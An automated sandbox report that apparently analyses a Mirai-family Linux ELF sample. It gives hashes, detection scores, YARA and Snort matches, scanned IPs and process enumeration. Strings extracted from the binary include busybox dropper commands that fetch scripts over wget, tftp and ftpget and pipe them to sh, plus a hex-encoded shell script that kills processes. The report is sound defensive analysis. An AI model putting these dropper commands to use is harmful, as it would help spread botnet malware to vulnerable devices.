Linux Analysis Report
fwkeLXlthW.elf

Overview

General Information

Sample name:	fwkeLXlthW.elf renamed because original name is a hash value
Original sample name:	4e3269ecb73ec06315bb4649325006c9.elf
Analysis ID:	1432506
MD5:	4e3269ecb73ec06315bb4649325006c9
SHA1:	1f6a25b2282f2acaed2f02b25eb5e3180f2232a9
SHA256:	aeeca28a10aed98529173178dacc8533fc21fc22f2f88fd3e5e073c97445f2d8
Tags:	32elfintelmirai
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Connects to many ports of the same IP (likely port scanning)

Machine Learning detection for sample

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes the "rm" command used to delete files or directories

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Yara signature match

Classification

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: fwkeLXlthW.elf	Virustotal: Detection: 37%			Perma Link
Source: fwkeLXlthW.elf	ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: fwkeLXlthW.elf

Joe Sandbox ML: detected

Found strings indicative of a multi-platform dropper

Source: fwkeLXlthW.elf	String: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- \| shGET /dlr. HTTP/1.0
Source: fwkeLXlthW.elf	String: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:45894 -> 186.132.173.53:23

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 204.76.203.101 ports 38241,1,2,3,4,8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.23:41498 -> 204.76.203.101:38241

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic	TCP traffic: 192.168.2.23:39258 -> 34.249.145.219:443
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 92.93.39.208
Source: unknown	TCP traffic detected without corresponding DNS query: 71.107.107.71
Source: unknown	TCP traffic detected without corresponding DNS query: 137.194.217.199
Source: unknown	TCP traffic detected without corresponding DNS query: 98.184.114.145
Source: unknown	TCP traffic detected without corresponding DNS query: 19.87.118.167
Source: unknown	TCP traffic detected without corresponding DNS query: 108.47.38.188
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.77.113
Source: unknown	TCP traffic detected without corresponding DNS query: 163.81.71.18
Source: unknown	TCP traffic detected without corresponding DNS query: 64.198.117.53
Source: unknown	TCP traffic detected without corresponding DNS query: 150.70.8.139
Source: unknown	TCP traffic detected without corresponding DNS query: 54.105.186.247
Source: unknown	TCP traffic detected without corresponding DNS query: 124.181.78.48
Source: unknown	TCP traffic detected without corresponding DNS query: 20.206.175.57
Source: unknown	TCP traffic detected without corresponding DNS query: 159.31.215.96
Source: unknown	TCP traffic detected without corresponding DNS query: 43.21.228.139
Source: unknown	TCP traffic detected without corresponding DNS query: 196.114.218.54
Source: unknown	TCP traffic detected without corresponding DNS query: 101.73.117.130
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.30.205
Source: unknown	TCP traffic detected without corresponding DNS query: 191.164.198.26
Source: unknown	TCP traffic detected without corresponding DNS query: 114.158.178.175
Source: unknown	TCP traffic detected without corresponding DNS query: 187.169.247.130
Source: unknown	TCP traffic detected without corresponding DNS query: 141.188.57.73
Source: unknown	TCP traffic detected without corresponding DNS query: 146.62.111.231
Source: unknown	TCP traffic detected without corresponding DNS query: 7.175.70.7
Source: unknown	TCP traffic detected without corresponding DNS query: 137.160.2.214
Source: unknown	TCP traffic detected without corresponding DNS query: 79.209.55.108
Source: unknown	TCP traffic detected without corresponding DNS query: 68.184.17.218
Source: unknown	TCP traffic detected without corresponding DNS query: 196.225.183.108
Source: unknown	TCP traffic detected without corresponding DNS query: 93.205.90.8
Source: unknown	TCP traffic detected without corresponding DNS query: 27.121.72.117
Source: unknown	TCP traffic detected without corresponding DNS query: 135.121.121.215
Source: unknown	TCP traffic detected without corresponding DNS query: 52.170.149.210
Source: unknown	TCP traffic detected without corresponding DNS query: 173.15.20.241
Source: unknown	TCP traffic detected without corresponding DNS query: 69.9.160.58
Source: unknown	TCP traffic detected without corresponding DNS query: 99.28.120.35
Source: unknown	TCP traffic detected without corresponding DNS query: 190.86.136.254
Source: unknown	TCP traffic detected without corresponding DNS query: 62.127.39.150
Source: unknown	TCP traffic detected without corresponding DNS query: 142.232.95.3
Source: unknown	TCP traffic detected without corresponding DNS query: 217.213.177.132
Source: unknown	TCP traffic detected without corresponding DNS query: 202.242.221.153
Source: unknown	TCP traffic detected without corresponding DNS query: 92.216.200.124
Source: unknown	TCP traffic detected without corresponding DNS query: 174.167.254.173
Source: unknown	TCP traffic detected without corresponding DNS query: 55.115.0.227
Source: unknown	TCP traffic detected without corresponding DNS query: 90.99.1.180
Source: unknown	TCP traffic detected without corresponding DNS query: 124.96.51.1
Source: unknown	TCP traffic detected without corresponding DNS query: 180.233.125.176
Source: unknown	TCP traffic detected without corresponding DNS query: 178.205.122.115
Source: unknown	TCP traffic detected without corresponding DNS query: 169.117.211.104
Source: unknown	TCP traffic detected without corresponding DNS query: 145.132.104.81
Source: unknown	TCP traffic detected without corresponding DNS query: 68.20.243.120

Source: global traffic

DNS traffic detected: DNS query: netfags.geek

Source: fwkeLXlthW.elf

String found in binary or memory: http:///curl.sh

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39258 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample	String containing 'busybox' found: /wget.sh -O- \| sh;/bin/busybox tftp -g
Source: Initial sample	String containing 'busybox' found: -r tftp.sh -l- \| sh;/bin/busybox ftpget
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sample	String containing 'busybox' found: /bin/busyboxincorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http:///curl.sh -o- \| shGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: .dThe People's/var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Yara signature match

Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: fwkeLXlthW.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6256.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6254.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal72.troj.linELF@0/0@1/0

Enumerates processes within the "proc" file system

Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/4331/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2033/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1582/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2275/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1612/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1579/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1699/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1335/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1698/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2028/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1334/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1576/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2302/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/3236/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2025/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2146/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/912/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/759/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2307/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/918/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/6087/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/6241/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1594/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2285/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2281/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1349/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1623/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/761/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1622/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/884/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1983/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2038/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1586/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1465/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1344/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1860/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1463/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2156/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/800/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/801/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1629/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/6239/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1627/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1900/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/491/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2294/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2050/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1877/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/772/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1633/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1599/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1632/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1477/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/774/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1476/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1872/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2048/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1475/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2289/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/777/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/658/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/936/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1639/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1638/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2208/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2180/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1809/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1494/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1890/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2063/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2062/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1888/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1886/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1489/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/785/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1642/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/788/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/789/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1648/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2078/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2077/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2074/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2195/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/793/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1656/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1654/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2226/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1532/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/796/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/797/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2069/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2102/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2223/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/799/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2080/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2242/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2084/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2083/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1668/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1664/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/1389/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/720/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2114/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/2235/status	Jump to behavior
Source: /tmp/fwkeLXlthW.elf (PID: 6256)	File opened: /proc/721/status	Jump to behavior

Executes the "rm" command used to delete files or directories

Source: /usr/bin/dash (PID: 6307)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.fFD4gfLXFO /tmp/tmp.QPFGv5zNHi /tmp/tmp.4V1i9LBHGg			Jump to behavior
Source: /usr/bin/dash (PID: 6308)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.fFD4gfLXFO /tmp/tmp.QPFGv5zNHi /tmp/tmp.4V1i9LBHGg			Jump to behavior

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
215.54.79.38	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
144.105.67.23	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
88.215.40.244	unknown	United Kingdom	31655	ASN-GAMMATELECOMGB	false
81.43.97.158	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
82.212.122.233	unknown	Jordan	47887	NEU-ASJO	false
